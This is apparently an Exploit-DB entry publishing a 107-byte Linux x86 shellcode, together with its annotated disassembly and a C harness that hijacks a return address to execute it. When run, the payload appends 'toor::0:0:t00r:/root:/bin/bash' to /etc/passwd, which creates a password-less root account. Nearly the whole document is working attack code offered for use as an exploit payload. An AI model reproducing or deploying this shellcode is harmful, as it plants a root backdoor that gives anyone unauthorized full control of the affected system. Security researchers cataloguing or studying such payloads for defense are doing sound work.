Linux/x86 - Add Root User (toor) To /etc/passwd + No Password + exit() Shellcode (107 bytes)

EDB-ID:

13579

CVE:

N/A




Platform:

Linux_x86

Date:

2009-12-31


/*
    append_passwd.c
    Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding a password-less root account with login name "toor"
    Platform: linux/x86
    Size: 107 bytes
    Author: $andman
*/

/*
08049054 <_start>:
 8049054:    eb 38                    jmp    804908e <callfunc>

08049056 <func>:
 8049056:    5e                       pop    %esi
 8049057:    31 c0                    xor    %eax,%eax
 8049059:    88 46 0b                 mov    %al,0xb(%esi)
 804905c:    88 46 2b                 mov    %al,0x2b(%esi)
 804905f:    c6 46 2a 0a              movb   $0xa,0x2a(%esi)
 8049063:    8d 5e 0c                 lea    0xc(%esi),%ebx
 8049066:    89 5e 2c                 mov    %ebx,0x2c(%esi)
 8049069:    8d 1e                    lea    (%esi),%ebx
 804906b:    66 b9 42 04              mov    $0x442,%cx
 804906f:    66 ba a4 01              mov    $0x1a4,%dx
 8049073:    b0 05                    mov    $0x5,%al
 8049075:    cd 80                    int    $0x80
 8049077:    89 c3                    mov    %eax,%ebx
 8049079:    31 d2                    xor    %edx,%edx
 804907b:    8b 4e 2c                 mov    0x2c(%esi),%ecx
 804907e:    b2 1f                    mov    $0x1f,%dl
 8049080:    b0 04                    mov    $0x4,%al
 8049082:    cd 80                    int    $0x80
 8049084:    b0 06                    mov    $0x6,%al
 8049086:    cd 80                    int    $0x80
 8049088:    b0 01                    mov    $0x1,%al
 804908a:    31 db                    xor    %ebx,%ebx
 804908c:    cd 80                    int    $0x80

0804908e <callfunc>:
 804908e:    e8 c3 ff ff ff           call   8049056 <func>
 8049093:    ......string.......
*/

#include <stdio.h>
#include <string.h>

char shell[]=   "\xeb\x38\x5e\x31\xc0\x88\x46\x0b\x88\x46\x2b\xc6\x46\x2a\x0a\x8d\x5e\x0c\x89\x5e\x2c\x8d\x1e"
        "\x66\xb9\x42\x04\x66\xba\xa4\x01\xb0\x05\xcd\x80\x89\xc3\x31\xd2\x8b\x4e\x2c\xb2\x1f\xb0\x04"
        "\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70"
        "\x61\x73\x73\x77\x64\x23\x74\x6f\x6f\x72\x3a\x3a\x30\x3a\x30\x3a\x74\x30\x30\x72\x3a\x2f\x72"
        "\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x23";
main(){
    printf("[+]shellcode length %d\n", strlen(shell));
    int *ret;
      ret = (int *)&ret + 2;
      (*ret) = (int)shell;
}
//HAPPY NEW YEAR!
//#$